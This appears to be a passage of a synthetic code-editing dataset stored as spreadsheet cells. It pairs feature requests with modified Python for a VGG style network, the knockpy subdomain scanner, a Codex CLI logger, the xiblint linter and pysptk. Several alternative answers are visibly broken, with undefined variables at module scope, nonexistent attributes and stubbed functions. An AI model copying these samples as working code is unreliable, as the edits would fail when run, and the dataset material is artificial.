    <t>{'#file 1': "def net(data_path, input_image):\n    layers = (\n        'conv1_1', 'relu1_1', 'conv1_2', 'relu1_2', 'pool1',\n        'conv2_1', 'relu2_1', 'conv2_2', 'relu2_2', 'pool2',\n        'conv3_1', 'relu3_1', 'conv3_2', 'relu3_2', 'conv3_3',\n        'relu3_3', 'conv3_4', 'relu3_4', 'pool3',\n        'conv4_1', 'relu4_1', 'conv4_2', 'relu4_2', 'conv4_3',\n        'relu4_3', 'conv4_4', 'relu4_4', 'pool4',\n        'conv5_1', 'relu5_1', 'conv5_2', 'relu5_2', 'conv5_3',\n        'relu5_3', 'conv5_4', 'relu5_4'\n    )\n\n    data = scipy.io.loadmat(data_path)\n    mean = data['normalization'][0][0][0]\n    mean_pixel = np.mean(mean, axis=(0, 1))\n    weights = data['layers'][0]\n\n    net = {}\n    #Modify: Add noise to the input image\n    input_image = add_noise_to_image(input_image)\n    current = input_image\n    for i, name in enumerate(layers):\n        kind = name[:4]\n        if kind == 'conv':\n            kernels, bias = weights[i][0][0][0][0]\n            kernels = np.transpose(kernels, (1, 0, 2, 3))\n            bias = bias.reshape(-1)\n            current = _conv_layer(current, kernels, bias)\n        elif kind == 'relu':\n            current = tf.nn.relu(current)\n        elif kind == 'pool':\n            current = _pool_layer(current)\n        net[name] = current\n\n    assert len(net) == len(layers)\n    return net", '#file 2': "style_features = {}\n\n    batch_shape = (batch_size,256,256,3)\n    style_shape = (1,) + style_target.shape\n    print(style_shape)\n\n    # precompute style features\n    with tf.Graph().as_default(), tf.device('/cpu:0'), tf.compat.v1.Session() as sess:\n        style_image = tf.compat.v1.placeholder(tf.float32, shape=style_shape, name='style_image')\n        style_image_pre = vgg.preprocess(style_image)\n        net = vgg.net(vgg_path, style_image_pre)\n        style_pre = np.array([style_target])\n        for layer in STYLE_LAYERS:\n            features = net[layer].eval(feed_dict={style_image:style_pre})\n            features = np.reshape(features, (-1, features.shape[3]))\n            gram = np.matmul(features.T, features) / features.size\n            style_features[layer] = gram", '#file 3': 'def add_noise_to_image(image, noise_level=0.1):\n    noise = np.random.normal(0, noise_level, image.shape)\n    noisy_image = image + noise\n    return np.clip(noisy_image, 0, 255)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "def main():\n    parser = argparse.ArgumentParser(...)\n    ...\n    if args.domain:\n        domain = args.domain\n        ...\n        results = KNOCKPY(domain, args.dns, args.useragent, args.timeout)\n        output(results, args.json)\n    if args.file:\n        with open(args.file,'r') as f:\n            domains = f.read().splitlines()\n        results = KNOCKPY(domains, args.dns, args.useragent, args.timeout)\n        output(results, args.json)", 'invoking_code_segment': 'def main():\n    knockpy.main()', 'feature_description': 'Add a new feature to print a message when a domain is processed. This involves adding a callback parameter to the KNOCKPY function that gets invoked for each domain being scanned, allowing the caller to receive notifications about domain processing progress.', 'modified_complete_code': '# File 1: knock/knock/knockpy.py\n# Modify the KNOCKPY function signature and implementation\n\ndef KNOCKPY(domain, dns=None, useragent=None, timeout=None, threads=None, recon=None, bruteforce=None, wordlist=None, on_domain_process=None):\n    #Modify - Added on_domain_process parameter\n    def knockpy(domain, dns=None, useragent=None, timeout=None):\n        #New - Call the callback when processing a domain\n        if on_domain_process:\n            on_domain_process(domain)\n        return HttpStatus(domain, dns, useragent, timeout).scan()\n    \n    if recon and bruteforce:\n        domain = Recon(domain, timeout).start()\n        domain += Bruteforce(domain, wordlist).start()\n        domain = list(set(domain))\n    elif recon:\n        domain = Recon(domain, timeout).start()\n    elif bruteforce:\n        domain = Bruteforce(domain, wordlist).start()\n\n    if isinstance(domain, list):\n        if not threads:\n            threads = 10\n        \n        pbar = tqdm(range(len(domain)), desc="Processing", leave=True, ncols=80)\n        with concurrent.futures.ThreadPoolExecutor(max_workers=threads) as executor:\n            futures = [executor.submit(knockpy, d, dns, useragent, timeout) for d in domain]\n\n            results = []\n            for future in concurrent.futures.as_completed(futures):\n                pbar.update(1)\n                if future.result():\n                    results.append(future.result())\n\n        return results\n\n    return knockpy(domain, dns=None, useragent=None, timeout=None)\n\n# File 2: knock/knockpy.py\n# Modify the main function to define and pass the callback\n\nfrom knockpy import knockpy\n\ndef main():\n    #New - Define callback function for domain processing\n    def on_domain_process(domain):\n        print(f"[*] Processing domain: {domain}")\n    \n    #Modify - Pass the callback to knockpy.main with the callback function\n    knockpy.main(on_domain_process=on_domain_process)\n\n# Modify knockpy.main() in knock/knock/knockpy.py to accept the callback parameter\ndef main(on_domain_process=None):\n    parser = argparse.ArgumentParser(\n        prog="KNOCKPY", \n        description=f"knockpy v.{__version__} - Subdomain Scan\\nhttps://github.com/guelfoweb/knock", \n        formatter_class=argparse.RawTextHelpFormatter\n        )\n\n    # args\n    parser.add_argument("-d", "--domain", help="domain to analyze")\n    parser.add_argument("-f", "--file", help="domain list from file path")\n    parser.add_argument("-v", "--version", action="version", version="%(prog)s " + __version__)\n    parser.add_argument("--dns", help="custom dns", dest="dns", required=False)\n    parser.add_argument("--useragent", help="custom useragent", dest="useragent", required=False)\n    parser.add_argument("--timeout", help="custom timeout", dest="timeout", type=float, required=False)\n    parser.add_argument("--threads", help="custom threads", dest="threads", type=int, required=False)\n    parser.add_argument("--recon", help="subdomain reconnaissance", action="store_true", required=False)\n    parser.add_argument("--bruteforce", help="subdomain bruteforce", action="store_true", required=False)\n    parser.add_argument("--wordlist", help="wordlist file to import\\n--bruteforce option required", dest="wordlist", required=False)\n    parser.add_argument(\'--wildcard\', help="test wildcard and exit", action="store_true", required=False)\n    parser.add_argument(\'--json\', help="shows output in json format", action="store_true", required=False)\n    parser.add_argument("--save", help="folder to save report", dest="folder", required=False)\n    parser.add_argument("--report", help="shows saved report", dest="report", required=False)\n    args = parser.parse_args()\n\n    if not args.domain and not args.file:\n        if not sys.stdin.isatty():\n            stdin = [domain.strip() for domain in sys.stdin.readlines()]\n            if len(stdin) == 1:\n                if os.path.isfile(stdin[0]):\n                    args.file = stdin[0]\n                else:\n                    args.domain = stdin[0]\n            elif len(stdin) &gt; 1:\n                args.domain = stdin\n        elif args.report:\n            show_report(args.json, args.report)\n            sys.exit(0)\n        else:\n            parser.print_help(sys.stderr)\n            sys.exit(0)\n\n    if args.domain:\n        domain = args.domain\n        if args.wildcard:\n            domain = Bruteforce(domain).wildcard()\n            results = KNOCKPY(domain, args.dns, args.useragent, args.timeout, on_domain_process=on_domain_process)\n            #Modify - Added on_domain_process parameter\n            output(results, args.json)\n            sys.exit(0)\n\n        if args.recon and args.bruteforce:\n            print ("bruteforce", args.wordlist)\n            domain = Recon(args.domain, args.timeout).start()\n            domain += Bruteforce(args.domain, args.wordlist).start()\n            domain = list(set(domain))\n        elif args.recon:\n            domain = Recon(args.domain, args.timeout).start()\n        elif args.bruteforce:\n            domain = Bruteforce(args.domain, args.wordlist).start()\n\n        results = KNOCKPY(domain, args.dns, args.useragent, args.timeout, on_domain_process=on_domain_process)\n        #Modify - Added on_domain_process parameter\n        \n        if args.recon or args.bruteforce:\n            save(args.domain, results, args.folder)\n        \n        output(results, args.json)\n    \n    if args.file:\n        with open(args.file,\'r\') as f:\n            domains = f.read().splitlines()\n        results = KNOCKPY(domains, args.dns, args.useragent, args.timeout, on_domain_process=on_domain_process)\n        #Modify - Added on_domain_process parameter\n        output(results, args.json)'}</t>
  </si>
  <si>
    <t>{'#file 1': '#Modify\nimport sys\nimport os\nfrom knockpy import knockpy\nfrom new_feature import new_feature  #New\n\ndef main():\n    knockpy.main()\n    new_feature(knockpy.args.domain)  #New', '#file 2': '#Modify\nif __name__ == "__main__":\n    try:\n        main()\n    except KeyboardInterrupt:\n        print("\\nInterrupted")\n        try:\n            sys.exit(0)\n        except SystemExit:\n            os._exit(0)', '#file 3': '#New\ndef new_feature(domain):\n    print(f"New feature invoked for domain: {domain}")\n    # Additional functionality can be added here'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'PromptFile class methods: add_input_output_pair(), read_prompt_file(), and __init__()', 'invoking_code_segment': 'codex_query.py main execution block where PromptFile is instantiated and methods are called', 'feature_description': 'Add logging functionality to record user queries and Codex responses to a log file with timestamps, including query content, response content, configuration used, and any errors encountered.', 'modified_complete_code': '# File 1: prompt_file.py - Add logging functionality\nimport os\nimport time\nimport configparser\nimport logging  # #New\nfrom pathlib import Path\n\nAPI_KEYS_LOCATION = os.path.join(os.path.dirname(os.path.realpath(__file__)), \'openaiapirc\')\n\nclass PromptFile:\n    context_source_filename = ""\n    default_context_filename = "current_context.txt"\n    default_file_path = os.path.join(os.path.dirname(__file__), "..", default_context_filename)\n    default_config_path = os.path.join(os.path.dirname(__file__), "..", "current_context.config")\n    default_log_path = os.path.join(os.path.dirname(__file__), "..", "codex_query.log")  # #New\n\n    def __init__(self, file_name, config):\n        self.context_source_filename = "{}-context.txt".format(config[\'shell\'])\n        self.file_path = self.default_file_path\n        self.config_path = self.default_config_path\n        self.config = config  # #Modify - store config\n        \n        # #New - Initialize logging\n        self.logger = self._setup_logger()\n        \n        if file_name != self.default_context_filename:\n            self.load_context(file_name, True)\n    \n    def _setup_logger(self):  # #New\n        """Setup logging configuration"""\n        logger = logging.getLogger(\'CodexCLI\')\n        if not logger.handlers:\n            logger.setLevel(logging.INFO)\n            handler = logging.FileHandler(self.default_log_path)\n            formatter = logging.Formatter(\'%(asctime)s - %(levelname)s - %(message)s\', datefmt=\'%Y-%m-%d %H:%M:%S\')\n            handler.setFormatter(formatter)\n            logger.addHandler(handler)\n        return logger\n    \n    def log_query_response(self, user_query, response, config):  # #New\n        """Log user query and Codex response with metadata"""\n        log_message = f"Query: {user_query.strip()} | Response: {response.strip()} | Engine: {config.get(\'engine\')} | Temperature: {config.get(\'temperature\')} | Shell: {config.get(\'shell\')}"\n        self.logger.info(log_message)\n    \n    def log_error(self, error_message):  # #New\n        """Log errors encountered during query processing"""\n        self.logger.error(error_message)\n\n    def has_config(self):\n        """Check if the prompt file has a corresponding config file"""\n        return os.path.isfile(self.config_path)\n    \n    def read_config(self):\n        """Read the prompt config and return a dictionary"""\n        if self.has_config() == False:\n            self.set_config(self.config)\n            return self.config\n        \n        with open(self.config_path, \'r\') as f:\n            lines = f.readlines()\n\n        config = {\n            \'engine\': lines[0].split(\':\')[1].strip(),\n            \'temperature\': float(lines[1].split(\':\')[1].strip()),\n            \'max_tokens\': int(lines[2].split(\':\')[1].strip()),\n            \'shell\': lines[3].split(\':\')[1].strip(),\n            \'multi_turn\': lines[4].split(\':\')[1].strip(),\n            \'token_count\': int(lines[5].split(\':\')[1].strip())\n        }\n        self.config = config\n        return self.config \n    \n    def set_config(self, config):\n        """Set the prompt headers with the new config"""\n        self.config = config\n        with open(self.config_path, \'w\') as f:\n            f.write(\'engine: {}\\n\'.format(self.config[\'engine\']))\n            f.write(\'temperature: {}\\n\'.format(self.config[\'temperature\']))\n            f.write(\'max_tokens: {}\\n\'.format(self.config[\'max_tokens\']))\n            f.write(\'shell: {}\\n\'.format(self.config[\'shell\']))\n            f.write(\'multi_turn: {}\\n\'.format(self.config[\'multi_turn\']))\n            f.write(\'token_count: {}\\n\'.format(self.config[\'token_count\']))\n    \n    def show_config(self):\n        print(\'\\n\')\n        lines = []\n        for key, value in self.config.items():\n            lines.append(\'# {}: {}\\n\'.format(key, value))\n        print(\'\'.join(lines))\n    \n    def add_input_output_pair(self, user_query, prompt_response):\n        """Add lines to file_name and update the token_count"""\n        with open(self.file_path, \'a\') as f:\n            f.write(user_query)\n            f.write(prompt_response)\n        \n        if self.config[\'multi_turn\'] == \'on\':\n            self.config[\'token_count\'] += len(user_query.split()) + len(prompt_response.split())\n            self.set_config(self.config)\n    \n    def read_prompt_file(self, input):\n        """Get the updated prompt file, check for token overflow and append current input"""\n        input_tokens_count = len(input.split())\n        need_to_refresh = (self.config[\'token_count\'] + input_tokens_count &gt; 2048)\n\n        if need_to_refresh:\n            with open(self.file_path, \'r\') as f:\n                lines = f.readlines()\n                prompt = lines[2:]\n            with open(self.file_path, \'w\') as f:\n                f.writelines(prompt)\n\n        with open(self.file_path, \'r\') as f:\n            lines = f.readlines()\n        return \'\'.join(lines)\n    \n    def get_token_count(self):\n        """Get the actual token count"""\n        token_count = 0\n        if self.has_config():\n            with open(self.config_path, \'r\') as f:\n                lines = f.readlines()\n                token_count = int(lines[5].split(\':\')[1].strip())\n        \n        true_token_count = 0\n        with open(self.file_path, \'r\') as f:\n            lines = f.readlines()\n            for line in lines:\n                true_token_count += len(line.split())\n        \n        if true_token_count != token_count:\n            self.config[\'token_count\'] = true_token_count\n            self.set_config(self.config)\n        \n        return true_token_count\n    \n    def clear(self):\n        """Clear the prompt file, while keeping the config"""\n        config = self.read_config()\n        filename = time.strftime("%Y-%m-%d_%H-%M-%S") + ".txt"\n        with open(self.file_path, \'r\') as f:\n            lines = f.readlines()\n            filename = os.path.join(os.path.dirname(__file__), "..", "deleted", filename)\n            with Path(filename).open(\'w\') as f:\n                f.writelines(lines)\n        \n        with open(self.file_path, \'w\') as f:\n            f.write(\'\')\n        \n        print("\\n#   Context has been cleared, temporarily saved to {}".format(filename))\n        self.set_config(config)\n    \n    def clear_last_interaction(self):\n        """Clear the last interaction from the prompt file"""\n        with open(self.file_path, \'r\') as f:\n            lines = f.readlines()\n            if len(lines) &gt; 1:\n                lines.pop()\n                lines.pop()\n                with open(self.file_path, \'w\') as f:\n                    f.writelines(lines)\n            print("\\n#   Unlearned interaction")\n    \n    def save_to(self, save_name):\n        """Save the prompt file to a new location with the config"""\n        if not save_name.endswith(\'.txt\'):\n            save_name = save_name + \'.txt\'\n        save_path = os.path.join(os.path.dirname(__file__), "..", "contexts", save_name)\n\n        with open(self.config_path, \'r\') as f:\n            lines = f.readlines()\n            lines = [\'## \' + line for line in lines]\n            with Path(save_path).open(\'w\') as f:\n                f.writelines(lines)\n        \n        with open(self.file_path, \'r\') as f:\n            lines = f.readlines()\n            with Path(save_path).open(\'a\') as f:\n                f.writelines(lines)\n        \n        print(\'\\n#   Context saved to {}\'.format(save_name))\n    \n    def start_multi_turn(self):\n        """Turn on context mode"""\n        self.config[\'multi_turn\'] = \'on\'\n        self.set_config(self.config)\n        print("\\n#   Multi turn mode is on")\n\n    def stop_multi_turn(self):\n        """Turn off context mode"""\n        self.config[\'multi_turn\'] = \'off\'\n        self.set_config(self.config)\n        print("\\n#   Multi turn mode is off")\n    \n    def default_context(self):\n        """Go to default context"""\n        self.load_context(self.context_source_filename)\n    \n    def load_context(self, filename, initialize=False):\n        """Loads a context file into current_context"""\n        if not filename.endswith(\'.txt\'):\n            filename = filename + \'.txt\'\n        filepath = Path(os.path.join(os.path.dirname(__file__), "..", "contexts", filename))\n\n        if filepath.exists():\n            with filepath.open(\'r\') as f:\n                lines = f.readlines()\n            \n            config = configparser.ConfigParser()\n            config.read(API_KEYS_LOCATION)\n            ENGINE = config[\'openai\'][\'engine\'].strip(\'"\').strip("\'")\n\n            config = {\n                \'engine\': ENGINE,\n                \'temperature\': float(lines[1].split(\':\')[1].strip()),\n                \'max_tokens\': int(lines[2].split(\':\')[1].strip()),\n                \'shell\': lines[3].split(\':\')[1].strip(),\n                \'multi_turn\': lines[4].split(\':\')[1].strip(),\n                \'token_count\': int(lines[5].split(\':\')[1].strip())\n            }\n\n            if initialize == False or self.has_config() == False:\n                self.set_config(config)\n            else:\n                self.config = self.read_config()\n\n            lines = lines[6:]\n\n            if initialize == False or self.config[\'multi_turn\'] == "off":\n                with open(self.file_path, \'w\') as f:\n                    f.writelines(lines)\n                \n                if initialize == False:\n                    print(\'\\n#   Context loaded from {}\'.format(filename))\n        else:\n            print("\\n#   File not found")\n            return False\n\n# File 2: codex_query.py - Modify to use logging\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport openai\nimport sys\nimport os\nimport configparser\nimport re\nimport psutil\n\nfrom pathlib import Path\nfrom prompt_file import PromptFile\nfrom commands import get_command_result\n\nMULTI_TURN = "off"\nSHELL = ""\nENGINE = \'\'\nTEMPERATURE = 0\nMAX_TOKENS = 300\nDEBUG_MODE = False\n\nAPI_KEYS_LOCATION = os.path.join(os.path.dirname(os.path.realpath(__file__)), \'openaiapirc\')\nPROMPT_CONTEXT = Path(__file__).with_name(\'current_context.txt\')\n\ndef create_template_ini_file():\n    """If the ini file does not exist create it and add secret_key"""\n    if not os.path.isfile(API_KEYS_LOCATION):\n        print(\'# Please create a file at {} and add your secret key\'.format(API_KEYS_LOCATION))\n        print(\'# The format is:\\n\')\n        print(\'# [openai]\')\n        print(\'# organization_id=&lt;organization-id&gt;\')\n        print(\'# secret_key=&lt;your secret key&gt;\\n\')\n        print(\'# engine=&lt;engine-id&gt;\')\n        sys.exit(1)\n\ndef initialize():\n    """Initialize openAI and shell mode"""\n    global ENGINE\n\n    create_template_ini_file()\n    config = configparser.ConfigParser()\n    config.read(API_KEYS_LOCATION)\n\n    openai.api_key = config[\'openai\'][\'secret_key\'].strip(\'"\').strip("\'")\n    openai.organization = config[\'openai\'][\'organization_id\'].strip(\'"\').strip("\'")\n    ENGINE = config[\'openai\'][\'engine\'].strip(\'"\').strip("\'")\n\n    prompt_config = {\n        \'engine\': ENGINE,\n        \'temperature\': TEMPERATURE,\n        \'max_tokens\': MAX_TOKENS,\n        \'shell\': SHELL,\n        \'multi_turn\': MULTI_TURN,\n        \'token_count\': 0\n    }\n    \n    return PromptFile(PROMPT_CONTEXT.name, prompt_config)\n\ndef is_sensitive_content(content):\n    """Check if the content contains sensitive content"""\n    if len(content) == 0:\n        return False\n    \n    response = openai.Completion.create(\n        engine="content-filter-alpha",\n        prompt = "&lt;|endoftext|&gt;"+content+"\\n--\\nLabel:",\n        temperature=0,\n        max_tokens=1,\n        top_p=0,\n        logprobs=10\n        )\n    \n    output_label = response["choices"][0]["text"]\n    toxic_threshold = -0.355\n\n    if output_label == "2":\n        logprobs = response["choices"][0]["logprobs"]["top_logprobs"][0]\n\n        if logprobs["2"] &lt; toxic_threshold:\n            logprob_0 = logprobs.get("0", None)\n            logprob_1 = logprobs.get("1", None)\n\n            if logprob_0 is not None and logprob_1 is not None:\n                if logprob_0 &gt;= logprob_1:\n                    output_label = "0"\n                else:\n                    output_label = "1"\n            elif logprob_0 is not None:\n                output_label = "0"\n            elif logprob_1 is not None:\n                output_label = "1"\n\n        if output_label not in ["0", "1", "2"]:\n            output_label = "2"\n\n    return (output_label != "0")\n\ndef get_query(prompt_file):\n    """Uses stdin to get user input, treated as command or Codex query"""\n    if DEBUG_MODE:\n        entry = input("prompt: ") + \'\\n\'\n    else:\n        entry = sys.stdin.read()\n    command_result, prompt_file = get_command_result(entry, prompt_file)\n\n    if command_result == "":\n        return entry, prompt_file\n    else:\n        sys.exit(0)\n\ndef detect_shell():\n    global SHELL\n    global PROMPT_CONTEXT\n\n    parent_process_name = psutil.Process(os.getppid()).name()\n    POWERSHELL_MODE = bool(re.fullmatch(\'pwsh|pwsh.exe|powershell.exe\', parent_process_name))\n    BASH_MODE = bool(re.fullmatch(\'bash|bash.exe\', parent_process_name))\n    ZSH_MODE = bool(re.fullmatch(\'zsh|zsh.exe\', parent_process_name))\n\n    SHELL = "powershell" if POWERSHELL_MODE else "bash" if BASH_MODE else "zsh" if ZSH_MODE else "unknown"\n\n    shell_prompt_file = Path(os.path.join(os.path.dirname(__file__), "..", "contexts", "{}-context.txt".format(SHELL)))\n\n    if shell_prompt_file.is_file():\n        PROMPT_CONTEXT = shell_prompt_file\n\nif __name__ == \'__main__\':\n    detect_shell()\n    prompt_file = initialize()\n\n    try:\n        user_query, prompt_file = get_query(prompt_file)\n        \n        config = prompt_file.config if prompt_file else {\n            \'engine\': ENGINE,\n            \'temperature\': TEMPERATURE,\n            \'max_tokens\': MAX_TOKENS,\n            \'shell\': SHELL,\n            \'multi_turn\': MULTI_TURN,\n            \'token_count\': 0\n        }\n\n        prefix = ""\n        if config[\'shell\'] == "zsh":\n            prefix = \'#!/bin/zsh\\n\\n\'\n        elif config[\'shell\'] == "bash":\n            prefix = \'#!/bin/bash\\n\\n\'\n        elif config[\'shell\'] == "powershell":\n            prefix = \'&lt;# powershell #&gt;\\n\\n\'\n        elif config[\'shell\'] == "unknown":\n            print("\\n#\\tUnsupported shell type, please use # set shell &lt;shell&gt;")\n        else:\n            prefix = \'#\' + config[\'shell\'] + \'\\n\\n\'\n\n        codex_query = prefix + prompt_file.read_prompt_file(user_query) + user_query\n\n        response = openai.Completion.create(engine=config[\'engine\'], prompt=codex_query, temperature=config[\'temperature\'], max_tokens=config[\'max_tokens\'], stop="#")\n\n        completion_all = response[\'choices\'][0][\'text\']\n\n        if is_sensitive_content(user_query + \'\\n\' + completion_all):\n            print("\\n#   Sensitive content detected, response has been redacted")\n            # #Modify - Log redacted response\n            prompt_file.log_query_response(user_query, "[REDACTED - Sensitive Content]", config)\n        else:\n            print(completion_all)\n            # #Modify - Log successful query and response\n            prompt_file.log_query_response(user_query, completion_all, config)\n\n            if config[\'multi_turn\'] == "on":\n                if completion_all != "" or len(completion_all) &gt; 0:\n                    prompt_file.add_input_output_pair(user_query, completion_all)\n        \n    except FileNotFoundError as e:\n        print(\'\\n\\n# Codex CLI error: Prompt file not found, try again\')\n        # #New - Log file not found error\n        if \'prompt_file\' in locals():\n            prompt_file.log_error(f"FileNotFoundError: {str(e)}")\n    except openai.error.RateLimitError as e:\n        print(\'\\n\\n# Codex CLI error: Rate limit exceeded, try later\')\n        # #New - Log rate limit error\n        if \'prompt_file\' in locals():\n            prompt_file.log_error(f"RateLimitError: {str(e)}")\n    except openai.error.APIConnectionError as e:\n        print(\'\\n\\n# Codex CLI error: API connection error, are you connected to the internet?\')\n        # #New - Log API connection error\n        if \'prompt_file\' in locals():\n            prompt_file.log_error(f"APIConnectionError: {str(e)}")\n    except openai.error.InvalidRequestError as e:\n        print(\'\\n\\n# Codex CLI error: Invalid request - \' + str(e))\n        # #New - Log invalid request error\n        if \'prompt_file\' in locals():\n            prompt_file.log_error(f"InvalidRequestError: {str(e)}")\n    except Exception as e:\n        print(\'\\n\\n# Codex CLI error: Unexpected exception - \' + str(e))\n        # #New - Log unexpected exception\n        if \'prompt_file\' in locals():\n            prompt_file.log_error(f"Unexpected Exception: {str(e)}")'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def get_query(prompt_file):\n    """\n    uses the stdin to get user input\n    input is either treated as a command or as a Codex query\n\n    Returns: command result or context + input from stdin\n    """\n\n    # get input from terminal or stdin\n    if DEBUG_MODE:\n        entry = input("prompt: ") + \'\\n\'\n    else:\n        entry = sys.stdin.read()\n    # first we check if the input is a command\n    command_result, prompt_file = get_command_result(entry, prompt_file)\n\n    # if input is not a command, then query Codex, otherwise exit command has been run successfully\n    if command_result == "":\n        return entry, prompt_file\n    else:\n        sys.exit(0)\n\n#Modify: Add logging functionality\nfrom interaction_logger import log_interaction\n\n#New: Log the interaction\nlog_interaction(user_query, completion_all)', '#file 2': 'user_query, prompt_file = get_query(prompt_file)', '#file 3': 'def log_interaction(user_query, response):\n    """\n    Logs the user query and the response from Codex to a log file.\n    """\n    log_file_path = os.path.join(os.path.dirname(__file__), \'..\', \'interaction_log.txt\')\n    with open(log_file_path, \'a\') as log_file:\n        log_file.write(f\'User Query: {user_query}\\nResponse: {response}\\n\\n\')'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "def patch_element_tree():\n    # HACK to ensure cElementTree is not loaded -- we need the pure Python implementation\n    import sys\n    assert 'xml.etree.ElementTree' not in sys.modules\n    sys.modules['_elementtree'] = None  # type: ignore", 'invoking_code_segment': 'def main():\n    from .patch_element_tree import patch_element_tree\n    patch_element_tree()', 'feature_description': 'Add logging for file and rule processing to track which files are being linted and which rules are being applied during the linting process', 'modified_complete_code': '# xiblint/xiblint/patch_element_tree.py\nimport logging  # #New\n\nlogger = logging.getLogger(__name__)  # #New\n\ndef patch_element_tree():\n    # HACK to ensure cElementTree is not loaded -- we need the pure Python implementation\n    import sys\n    assert \'xml.etree.ElementTree\' not in sys.modules\n    sys.modules[\'_elementtree\'] = None  # type: ignore\n    logger.debug(\'ElementTree patched successfully\')  # #New\n\n# xiblint/xiblint/__main__.py\n#!/usr/bin/env python\n\nimport argparse\nimport json\nimport logging  # #New\nimport os\nimport sys\n\nfrom xiblint import __version__\n\nlogger = logging.getLogger(__name__)  # #New\n\ndef make_epilog_text():\n    import xiblint.rules\n    description = "Lint rules:\\n"\n\n    for rule_name in sorted(xiblint.rules.rule_checkers.keys()):\n        checker = xiblint.rules.rule_checkers[rule_name]\n        description += "\\t{}\\n".format(rule_name)\n        doc = checker.__doc__\n        if doc is not None:\n            for line in doc.strip().split("\\n"):\n                description += " " * 24 + "{}\\n".format(line.strip())\n\n    return description\n\ndef main():\n    # #Modify - Add logging configuration\n    logging.basicConfig(level=logging.INFO, format=\'%(levelname)s: %(message)s\')\n    logger.info(\'Starting xiblint\')\n    \n    from .patch_element_tree import patch_element_tree\n    patch_element_tree()\n\n    parser = argparse.ArgumentParser(\n        description=\'.xib / .storyboard linter\',\n        epilog=make_epilog_text(),\n        formatter_class=argparse.RawDescriptionHelpFormatter,\n    )\n    parser.add_argument("-v", "--version", action="version",\n                        version=__version__)\n    parser.add_argument("--reporter", choices=("raw", "json"),\n                        default="raw",\n                        help="custom reporter to use")\n    parser.add_argument("paths", nargs=argparse.REMAINDER,\n                        help="lint only at the specified paths")\n    args = parser.parse_args()\n\n    try:\n        from xiblint.config import Config\n        config = Config()\n    except IOError as ex:\n        logger.error(\'Config file error: {}\'.format(ex))  # #New\n        print(\'Error: {}\\n\'.format(ex))\n        parser.print_usage()\n        sys.exit(1)\n    except ValueError as ex:\n        logger.error(\'Config value error: {}: {}\'.format(Config.filename, ex))  # #New\n        print(\'Error: {}: {}\\n\'.format(Config.filename, ex))\n        parser.print_usage()\n        sys.exit(1)\n\n    #\n    # Process paths\n    #\n    errors = []\n    include_paths = args.paths or config.include_paths\n    logger.info(\'Processing {} path(s)\'.format(len(include_paths)))  # #New\n    for path in include_paths:\n        if os.path.isfile(path):\n            errors += process_file(path, config)\n        elif os.path.isdir(path):\n            for root, _, files in os.walk(path):\n                for filename in files:\n                    if os.path.splitext(filename)[1].lower() in (\'.storyboard\', \'.xib\'):\n                        file_path = os.path.join(root, filename)\n                        errors += process_file(file_path, config)\n        else:\n            logger.error(\'Invalid path: {}\'.format(path))  # #New\n            print("Error: Invalid path \'{}\'".format(path))\n            sys.exit(1)\n\n    print_errors(errors, args.reporter)\n    logger.info(\'Linting complete with {} error(s)\'.format(len(errors)))  # #New\n\n    sys.exit(1 if errors else 0)\n\ndef process_file(file_path, config):\n    logger.info(\'Processing file: {}\'.format(file_path))  # #New\n    from xiblint.xibcontext import XibContext\n    checkers = config.checkers(file_path)\n    context = XibContext(file_path)\n    if context.tree:\n        for rule_name, klass in checkers.items():\n            logger.debug(\'Applying rule {} to {}\'.format(rule_name, file_path))  # #New\n            context.rule_name = rule_name\n            rule_config = config.config_for_rule(file_path, rule_name)\n            instance = klass(rule_config)\n            instance.check(context)\n    return context.errors\n\ndef print_errors(errors, reporter):\n    if reporter == "raw":\n        for error_dict in errors:\n            error_str = error_dict[\'error\']\n            if \'rule\' in error_dict:\n                error_str += \' [rule: {}]\'.format(error_dict[\'rule\'])\n            print("{}:{}: error: {}".format(\n                error_dict["file"],\n                error_dict["line"],\n                error_str,\n            ))\n    elif reporter == "json":\n        print(json.dumps(errors))\n\nif __name__ == \'__main__\':\n    main()'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def process_file(file_path, config):\n    from xiblint.xibcontext import XibContext\n    #New\n    from xiblint.logging import log_file_processing, log_rule_processing\n    checkers = config.checkers(file_path)\n    context = XibContext(file_path)\n    #Modify\n    log_file_processing(file_path)\n    if context.tree:\n        for rule_name, klass in checkers.items():\n            context.rule_name = rule_name\n            rule_config = config.config_for_rule(file_path, rule_name)\n            instance = klass(rule_config)\n            #Modify\n            log_rule_processing(rule_name)\n            instance.check(context)\n    return context.errors', '#file 2': 'errors = []\ninclude_paths = args.paths or config.include_paths\nfor path in include_paths:\n    if os.path.isfile(path):\n        errors += process_file(path, config)\n    elif os.path.isdir(path):\n        for root, _, files in os.walk(path):\n            for filename in files:\n                if os.path.splitext(filename)[1].lower() in (\'.storyboard\', \'.xib\'):\n                    file_path = os.path.join(root, filename)\n                    errors += process_file(file_path, config)\n    else:\n        print("Error: Invalid path \'{}\'".format(path))\n        sys.exit(1)', '#file 3': "def log_file_processing(file_path):\n    print(f'Processing file: {file_path}')\n\ndef log_rule_processing(rule_name):\n    print(f'Processing rule: {rule_name}')"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'from .conversion import mc2e, mc2sp, mgc2b, sp2mc', 'invoking_code_segment': 'from .conversion import mc2e, mc2sp, mgc2b, sp2mc  # noqa', 'feature_description': "Add a new feature function 'c2acr' to pysptk that performs autocorrelation computation from cepstral coefficients, enabling users to convert cepstral domain representations to autocorrelation domain for advanced speech signal processing tasks.", 'modified_complete_code': '# pysptk/pysptk/conversion.py\n# #Modify - Add new function c2acr for cepstral to autocorrelation conversion\nimport numpy as np\nfrom .sptk import _c2acr\n\ndef mc2e(mc, alpha=0.0):\n    """Convert mel-cepstral coefficients to energy."""\n    # existing implementation\n    pass\n\ndef mc2sp(mc, alpha=0.0, fftlen=512):\n    """Convert mel-cepstral coefficients to spectrum."""\n    # existing implementation\n    pass\n\ndef mgc2b(mgc, alpha=0.0, gamma=0.0):\n    """Convert mel-generalized cepstral coefficients to band-limited spectrum."""\n    # existing implementation\n    pass\n\ndef sp2mc(sp, order=25, alpha=0.0):\n    """Convert spectrum to mel-cepstral coefficients."""\n    # existing implementation\n    pass\n\n# #New - Add new conversion function\ndef c2acr(c, m=None, fftlen=512):\n    """Convert cepstral coefficients to autocorrelation.\n    \n    Parameters\n    